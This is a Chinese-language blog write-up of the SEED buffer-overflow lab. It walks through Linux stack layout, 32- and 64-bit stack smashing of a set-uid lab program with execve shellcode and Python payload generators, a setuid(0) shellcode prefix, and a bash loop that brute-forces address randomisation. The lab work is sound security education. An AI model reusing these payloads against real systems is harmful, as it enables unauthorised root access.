<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sekla.cn","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="缓冲区溢出攻击攻击原理 代码段：存程序可执行代码。 数据段：存初始化的静态&#x2F;全局变量。 BSS段：存未初始化的静态&#x2F;全局变量。 堆： 存动态分配的内存。 栈： 存函数内的局部变量，或者和函数调用有关的数据，如返回地址和参数等。  函数调用入栈过程：参数先入栈（注意顺序是相反的），之后是返回地址入栈，接着前帧指针入栈，最后局部变量入栈（顺序取决于编译器）。">
<meta property="og:type" content="article">
<meta property="og:title" content="Seed安全实验系列-(3)-buffOverFlow实验">
<meta property="og:url" content="http://sekla.cn/2021/11/20/ss-lab3-bufoverflow/index.html">
<meta property="og:site_name" content="Sekla&#39;s Blog">
<meta property="og:description" content="缓冲区溢出攻击攻击原理 代码段：存程序可执行代码。 数据段：存初始化的静态&#x2F;全局变量。 BSS段：存未初始化的静态&#x2F;全局变量。 堆： 存动态分配的内存。 栈： 存函数内的局部变量，或者和函数调用有关的数据，如返回地址和参数等。  函数调用入栈过程：参数先入栈（注意顺序是相反的），之后是返回地址入栈，接着前帧指针入栈，最后局部变量入栈（顺序取决于编译器）。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/11/20/VjE2ihrXGfTg1RC.png">
<meta property="og:image" content="https://i.loli.net/2021/11/20/wvWjLFR2aAbfXhS.png">
<meta property="og:image" content="https://i.loli.net/2021/11/21/SkFUwBCPiNhxZa9.png">
<meta property="og:image" content="https://i.loli.net/2021/11/21/vEJrOeupXt5siKU.png">
<meta property="og:image" content="https://i.loli.net/2021/11/21/MYEZGXki89WSq7o.png">
<meta property="og:image" content="c:/Users/shentio/AppData/Roaming/Typora/typora-user-images/image-20211121150805655.png">
<meta property="og:image" content="https://i.loli.net/2021/11/21/wpxdzkHFL2EGrqf.png">
<meta property="og:image" content="https://i.loli.net/2021/11/21/s4U2F5ftjh3inpW.png">
<meta property="og:image" content="https://i.loli.net/2021/11/21/7oniQk8cEj4JVga.png">
<meta property="article:published_time" content="2021-11-20T04:00:00.000Z">
<meta property="article:modified_time" content="2021-11-22T08:41:54.352Z">
<meta property="article:author" content="Sekla">
<meta property="article:tag" content="Linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/11/20/VjE2ihrXGfTg1RC.png">

<link rel="canonical" href="http://sekla.cn/2021/11/20/ss-lab3-bufoverflow/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Seed安全实验系列-(3)-buffOverFlow实验 | Sekla's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  <script type="text/javascript" src="/js/my_js/clicklove.js"></script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Sekla's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Keep Learning Keep Doing</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">14</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">23</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">100</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://sekla.cn/2021/11/20/ss-lab3-bufoverflow/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Sekla">
      <meta itemprop="description" content="Sekla">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sekla's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Seed安全实验系列-(3)-buffOverFlow实验
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-11-20 12:00:00" itemprop="dateCreated datePublished" datetime="2021-11-20T12:00:00+08:00">2021-11-20</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-11-22 16:41:54" itemprop="dateModified" datetime="2021-11-22T16:41:54+08:00">2021-11-22</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">软件安全</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/Seed%E5%AE%89%E5%85%A8%E5%AE%9E%E9%AA%8C%E7%B3%BB%E5%88%97/" itemprop="url" rel="index"><span itemprop="name">Seed安全实验系列</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>5.3k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>5 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="缓冲区溢出攻击"><a href="#缓冲区溢出攻击" class="headerlink" title="缓冲区溢出攻击"></a>缓冲区溢出攻击</h2><h3 id="攻击原理"><a href="#攻击原理" class="headerlink" title="攻击原理"></a>攻击原理</h3><ul>
<li>代码段：存程序可执行代码。</li>
<li>数据段：存初始化的静态/全局变量。</li>
<li>BSS段：存未初始化的静态/全局变量。</li>
<li>堆： 存动态分配的内存。</li>
<li>栈： 存函数内的局部变量，或者和函数调用有关的数据，如返回地址和参数等。</li>
</ul>
<p>函数调用入栈过程：参数先入栈（注意顺序是相反的），之后是返回地址入栈，接着前帧指针入栈，最后局部变量入栈（顺序取决于编译器）。</p>
<a id="more"></a>

<h3 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h3><p>关闭栈随机化：</p>
<p><code>sudo sysctl -w kernel.randomize_va_space=0</code></p>
<p>更改zsh为dash链接</p>
<p><code>sudo ln -sf /bin/zsh /bin/sh</code></p>
<h3 id="Task1"><a href="#Task1" class="headerlink" title="Task1"></a>Task1</h3><p>​    熟悉shellcode，缓冲区溢出c语言不适合写恶意代码，恶意代码不是由操作系统加载的，而是由内存复制载入的。而c程序运行需要启动操作系统加载器。由于要复制，无法解决代码中的0问题。</p>
<h4 id="调用shellcode"><a href="#调用shellcode" class="headerlink" title="调用shellcode"></a>调用shellcode</h4><p>根据提供的代码进行实验，代码已经集合二进制代码。默认编译使用64位，并添加执行栈参数，否则为不可执行栈。</p>
<p>makefile：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">all: </span></span><br><span class="line">	gcc -m32 -z execstack -o a32.out call_shellcode.c</span><br><span class="line">	gcc -z execstack -o a64.out call_shellcode.c</span><br><span class="line"></span><br><span class="line"><span class="section">setuid:</span></span><br><span class="line">	gcc -m32 -z execstack -o a32.out call_shellcode.c</span><br><span class="line">	gcc -z execstack -o a64.out call_shellcode.c</span><br><span class="line">	sudo chown root a32.out a64.out</span><br><span class="line">	sudo chmod 4755 a32.out a64.out</span><br><span class="line"></span><br><span class="line"><span class="section">clean:</span></span><br><span class="line">	rm -f a32.out a64.out *.o</span><br></pre></td></tr></table></figure>

<p>使用make构建文件。</p>
<p><img src="https://i.loli.net/2021/11/20/VjE2ihrXGfTg1RC.png" alt="image-20211120221633013"></p>
<p>运行可执行文件后成功调用bin/sh</p>
<p>程序本质就是</p>
<h3 id="Task2"><a href="#Task2" class="headerlink" title="Task2"></a>Task2</h3><p>提供stack.c程序，这个程序有着缓冲区溢出的攻击面，任务是攻击并且获得root权限。</p>
<p>实验提供的程序读取了一个文件叫badfile，然后传递给输入流给另外一个bof函数的缓冲区，原始输入最大为517字节，但是缓冲区就100个字节，造成缓冲区溢出，因为程序是一个set-uid程序，所以普通用户可能使用这个漏洞来导致缓冲区溢出攻击，现在应该在badfile中改变内容，来造成缓冲区溢出并取得root权限。</p>
<p>根据指导stack.c文件已经提供，并提供了相应的makefile，</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">FLAGS    = -z execstack -fno-stack-protector</span><br><span class="line">FLAGS_32 = -m32</span><br><span class="line">TARGET   = stack-L1 stack-L2 stack-L3 stack-L4 stack-L1-dbg stack-L2-dbg stack-L3-dbg stack-L4-dbg</span><br><span class="line"></span><br><span class="line">L1 = 100</span><br><span class="line">L2 = 160</span><br><span class="line">L3 = 200</span><br><span class="line">L4 = 10</span><br></pre></td></tr></table></figure>

<p>已经指定不同的缓冲区值来进行编译。</p>
<h3 id="Task3"><a href="#Task3" class="headerlink" title="Task3"></a>Task3</h3><h4 id="1-研究"><a href="#1-研究" class="headerlink" title="1.研究"></a>1.研究</h4><p>首先在目录下make一下构建文件，要攻击目标程序，最首要的就是指导缓冲区的大小与返回地址的距离，用gdb调试L1程序。</p>
<p>首先创建badfile然后调试，并打印ebp的值，取得buffer的地址，注意帧指针在gdb中和实际执行时是不同的，因为gdb会添加一些环境数据到栈中，所以真实的帧指针应该更大。</p>
<p><img src="https://i.loli.net/2021/11/20/wvWjLFR2aAbfXhS.png" alt="image-20211120225552941"></p>
<h4 id="2-开始攻击"><a href="#2-开始攻击" class="headerlink" title="2.开始攻击"></a>2.开始攻击</h4><p>​    在badfile中保存文件，实验提供python程序来完成，替换一些python文件中的值来完成实验。需要修改的值已经标注。完成之后直接就可以创建badfile文件，并启动要攻击的stack编译后的可执行文件，成功即取得root权限。主要修改如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">shellcode= (</span><br><span class="line">  	<span class="string">&quot;\x31\xc0&quot;</span></span><br><span class="line">	<span class="string">&quot;\x50&quot;</span></span><br><span class="line">	<span class="string">&quot;\x68&quot;</span><span class="string">&quot;//sh&quot;</span></span><br><span class="line">	<span class="string">&quot;\x68&quot;</span><span class="string">&quot;/bin&quot;</span></span><br><span class="line">	<span class="string">&quot;\x89\xe3&quot;</span></span><br><span class="line">	<span class="string">&quot;\x50&quot;</span></span><br><span class="line">	<span class="string">&quot;\x53&quot;</span></span><br><span class="line">	<span class="string">&quot;\x89\xe1&quot;</span></span><br><span class="line">	<span class="string">&quot;\x99&quot;</span></span><br><span class="line">	<span class="string">&quot;\xb0\x0b&quot;</span></span><br><span class="line">	<span class="string">&quot;\xcd\x80&quot;</span></span><br><span class="line">).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Fill the content with NOP&#x27;s</span></span><br><span class="line">content = bytearray(<span class="number">0x90</span> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">517</span>)) </span><br><span class="line"></span><br><span class="line"><span class="comment">##################################################################</span></span><br><span class="line"><span class="comment"># Put the shellcode somewhere in the payload</span></span><br><span class="line">start = <span class="number">517</span>-len(shellcode)              <span class="comment"># Change this number </span></span><br><span class="line">content[start:start + len(shellcode)] = shellcode</span><br><span class="line"></span><br><span class="line"><span class="comment"># Decide the return address value </span></span><br><span class="line"><span class="comment"># and put it somewhere in the payload</span></span><br><span class="line">ret    = <span class="number">0xffffcb38</span>+<span class="number">48</span>        		<span class="comment"># Change this number </span></span><br><span class="line">offset = <span class="number">112</span>                       <span class="comment"># Change this number </span></span><br><span class="line"></span><br><span class="line">L = <span class="number">4</span>     <span class="comment"># Use 4 for 32-bit address and 8 for 64-bit address</span></span><br><span class="line">content[offset:offset + L] = (ret).to_bytes(L,byteorder=<span class="string">&#x27;little&#x27;</span>) </span><br></pre></td></tr></table></figure>

<p>ebp=0xffffcb38，返回地址即0xffffcb38+4，但是注意gdb导致栈更深，所以加大一点，返回地址相对位置即ebp-&amp;buffer，另外注意返回地址不应存在0，否则strcpy会提前结束复制。</p>
<p><img src="https://i.loli.net/2021/11/21/SkFUwBCPiNhxZa9.png" alt="image-20211121112618325"></p>
<h3 id="Task4"><a href="#Task4" class="headerlink" title="Task4"></a>Task4</h3><p>​    实际情况下缓冲区大小可能不知道，即使makefile提供了buffersize，但是不允许使用此信息。我们任务是相同的，假设知道buffer的大概大小，100-200字节，由于内存对齐，存储在帧指针中的值总是4的倍数(对于32位程序)。尽量减小蛮力尝试的次数。</p>
<p>不知道buffer size即offset，还是可以通过gdb获取ebp值，缓冲区大小不知道，那就一步步尝试。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##################################################################</span></span><br><span class="line"><span class="comment"># Put the shellcode somewhere in the payload</span></span><br><span class="line">start = <span class="number">517</span>-len(shellcode)              						<span class="comment"># Change this number </span></span><br><span class="line">content[start:start + len(shellcode)] = shellcode</span><br><span class="line"></span><br><span class="line"><span class="comment"># Decide the return address value </span></span><br><span class="line"><span class="comment"># and put it somewhere in the payload</span></span><br><span class="line">ret    = <span class="number">0xffffcb38</span>+<span class="number">208</span>    							    <span class="comment"># Change this number </span></span><br><span class="line"><span class="comment">#offset = 100                    						# Change this number </span></span><br><span class="line"></span><br><span class="line">L = <span class="number">4</span>     </span><br><span class="line"><span class="comment"># Use 4 for 32-bit address and 8 for 64-bit address </span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> offset <span class="keyword">in</span> range(<span class="number">100</span>,<span class="number">204</span>,<span class="number">4</span>):</span><br><span class="line">	content[offset:offset + L] = (ret).to_bytes (L,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>用返回地址进行范围覆盖，注意ret要在覆盖范围之外，否则返回地址会跳转到返回地址。</p>
<p><img src="https://i.loli.net/2021/11/21/vEJrOeupXt5siKU.png" alt="image-20211121144218737"></p>
<h3 id="Task5"><a href="#Task5" class="headerlink" title="Task5"></a>Task5</h3><p>​    由于64位下地址最高位2个字节总是0，就导致strcpy的时候遇到0停止，复制到栈中的时候内容不全，解决这个问题。</p>
<p><img src="https://i.loli.net/2021/11/21/MYEZGXki89WSq7o.png" alt="image-20211121121120785"></p>
<p>首先查看rbp和buffer地址，相同方法计算offset，这里为208+8。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##################################################################</span></span><br><span class="line"><span class="comment"># Put the shellcode somewhere in the payload</span></span><br><span class="line">start = <span class="number">96</span>             						<span class="comment"># Change this number </span></span><br><span class="line">content[start:start + len(shellcode)] = shellcode</span><br><span class="line"></span><br><span class="line"><span class="comment"># Decide the return address value </span></span><br><span class="line"><span class="comment"># and put it somewhere in the payload</span></span><br><span class="line">ret    = <span class="number">0x7fffffffd8d0</span> + <span class="number">160</span>  							    <span class="comment"># Change this number </span></span><br><span class="line">offset = <span class="number">216</span>                    							<span class="comment"># Change this number </span></span><br><span class="line"></span><br><span class="line">L = <span class="number">8</span>     </span><br><span class="line"><span class="comment"># Use 4 for 32-bit address and 8 for 64-bit address </span></span><br><span class="line"></span><br><span class="line">content[offset:offset + L] = (ret).to_bytes (L,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"><span class="comment">##################################################################</span></span><br></pre></td></tr></table></figure>

<p>把shellcode复制到buffer上，然后跳转到buffer上的shellcode即可解决。</p>
<p><img src="C:\Users\shentio\AppData\Roaming\Typora\typora-user-images\image-20211121150805655.png" alt="image-20211121150805655"></p>
<h3 id="Task6"><a href="#Task6" class="headerlink" title="Task6"></a>Task6</h3><p>类似task4不知道缓冲区大小，实际缓冲区大小很小，所以不能使用task5的方法，否则把返回地址也一并覆盖了。</p>
<p>可以修改返回地址，跳转到str上的shellcode而不是使用buffer中的。</p>
<p><img src="https://i.loli.net/2021/11/21/wpxdzkHFL2EGrqf.png" alt="image-20211121153918598"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##################################################################</span></span><br><span class="line"><span class="comment"># Put the shellcode somewhere in the payload</span></span><br><span class="line">start = <span class="number">517</span>-len(shellcode)             						<span class="comment"># Change this number </span></span><br><span class="line">content[start:start + len(shellcode)] = shellcode</span><br><span class="line"></span><br><span class="line"><span class="comment"># Decide the return address value </span></span><br><span class="line"><span class="comment"># and put it somewhere in the payload</span></span><br><span class="line">ret    = <span class="number">0x00007fffffffddd0</span> + <span class="number">160</span>  							    <span class="comment"># Change this number </span></span><br><span class="line">offset = <span class="number">18</span>                    							<span class="comment"># Change this number </span></span><br><span class="line"></span><br><span class="line">L = <span class="number">8</span>     </span><br><span class="line"><span class="comment"># Use 4 for 32-bit address and 8 for 64-bit address </span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">content[offset:offset + L] = (ret).to_bytes (L,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"><span class="comment">##################################################################</span></span><br></pre></td></tr></table></figure>



<h3 id="Task7"><a href="#Task7" class="headerlink" title="Task7"></a>Task7</h3><p>攻破dash和bash的保护机制，执行Dash之前调用setuid(0)，把真实用户id改成0， 我们可以通过在shellcode中执行execve()之前调用setuid(0)来实现这一点。 下面的程序集代码展示了如何调用setuid(0)。 二进制代码已经放在调用shellcode.c中。 您只需要将它添加到shellcode的开头。  </p>
<p><img src="https://i.loli.net/2021/11/21/s4U2F5ftjh3inpW.png" alt="image-20211121132454800"></p>
<p>可以发现一个有root，一个没有root。</p>
<p>在level1重复实验：</p>
<p><img src="https://i.loli.net/2021/11/21/7oniQk8cEj4JVga.png" alt="image-20211121133144073"></p>
<p>成功获得root。</p>
<h3 id="Task8"><a href="#Task8" class="headerlink" title="Task8"></a>Task8</h3><p>攻击地址随机化，比如32位系统中，栈只有19位的熵，意味着基地址只有2的19次方 = 524288种可能性，可以采用实验提供的脚本暴力破解。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash">!/bin/bash</span></span><br><span class="line"></span><br><span class="line">SECONDS=0</span><br><span class="line">value=0</span><br><span class="line"></span><br><span class="line">while true; do</span><br><span class="line">  value=$(( $value + 1 ))</span><br><span class="line">  duration=$SECONDS</span><br><span class="line">  min=$(($duration / 60))</span><br><span class="line">  sec=$(($duration % 60))</span><br><span class="line">  echo &quot;$min minutes and $sec seconds elapsed.&quot;</span><br><span class="line">  echo &quot;The program has been running $value times so far.&quot;</span><br><span class="line">  ./stack-L1</span><br><span class="line">done</span><br></pre></td></tr></table></figure>

<p>重复level1实验，然后运行脚本，反复尝试。</p>
<h3 id="Task9"><a href="#Task9" class="headerlink" title="Task9"></a>Task9</h3><h4 id="a-开启保护栈"><a href="#a-开启保护栈" class="headerlink" title="a.开启保护栈"></a>a.开启保护栈</h4><p>基于栈的缓冲区溢出攻击需要修改返回地址，如果能够在函数返回前检测到返回地址是否被修改，就能 抵御攻击。一种方法是将返回地址备份到其他地方。而StackGuard是在返回地址和缓冲区之间设置一个 哨兵，这个哨兵来检测返回地址是否被修改。缓冲区溢出攻击修改返回地址时，所有处于缓冲区和返回地址之间的内存值也会被修改。不想改变某个 特定位置的值，唯一方法是用相同的值覆盖这个位置</p>
<h4 id="b-攻击不可执行栈"><a href="#b-攻击不可执行栈" class="headerlink" title="b.攻击不可执行栈"></a>b.攻击不可执行栈</h4><p>需要注意的是，非可执行堆栈只会使在堆栈上运行shellcode变得不可能，但它并不能防止缓冲区溢出攻击，因为在利用缓冲区溢出漏洞之后，还有其他方法可以运行恶意代码。 return-tolibc攻击就是一个例子。 我们为这次袭击设计了一个单独的实验。 如果您感兴趣，请参阅我们的返回- libc攻击实验室的详细信息。  </p>

    </div>
    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/Linux/" rel="tag"><i class="fa fa-tag"></i> Linux</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/11/16/quest-v-3/" rel="prev" title="论文阅读RTSS-2014-Quest-V分离内核中的通信与迁移(3)实验评估">
      <i class="fa fa-chevron-left"></i> 论文阅读RTSS-2014-Quest-V分离内核中的通信与迁移(3)实验评估
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/11/22/moderncpp-9/" rel="next" title="现代C++-函数包装器">
      现代C++-函数包装器 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%94%BB%E5%87%BB"><span class="nav-number">1.</span> <span class="nav-text">缓冲区溢出攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="nav-number">1.1.</span> <span class="nav-text">攻击原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="nav-number">1.2.</span> <span class="nav-text">环境配置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task1"><span class="nav-number">1.3.</span> <span class="nav-text">Task1</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%B0%83%E7%94%A8shellcode"><span class="nav-number">1.3.1.</span> <span class="nav-text">调用shellcode</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task2"><span class="nav-number">1.4.</span> <span class="nav-text">Task2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task3"><span class="nav-number">1.5.</span> <span class="nav-text">Task3</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E7%A0%94%E7%A9%B6"><span class="nav-number">1.5.1.</span> <span class="nav-text">1.研究</span></a></li><li 